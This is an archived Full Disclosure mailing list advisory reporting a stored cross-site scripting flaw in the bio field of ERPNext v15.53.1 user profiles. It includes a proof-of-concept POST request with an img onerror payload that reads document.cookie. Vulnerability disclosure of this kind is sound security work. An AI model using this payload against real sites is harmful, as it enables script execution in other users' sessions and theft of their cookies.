Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

ERPNext v15.53.1 Stored XSS in bio Field Allows Arbitrary Script Execution in Profile Page

From: Ron E <ronaldjedgerson () gmail com>
Date: Fri, 30 May 2025 23:21:17 -0400
An authenticated attacker can inject JavaScript into the bio field of their
user profile. When the profile is viewed by another user, the injected
script executes.

*Proof of Concept:*

POST
/api/method/frappe.desk.page.user_profile.user_profile.update_profile_info
HTTP/2
Host: --host--

profile_info={"bio":"\"><img src=x onerror=alert(document.cookie)>"}
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: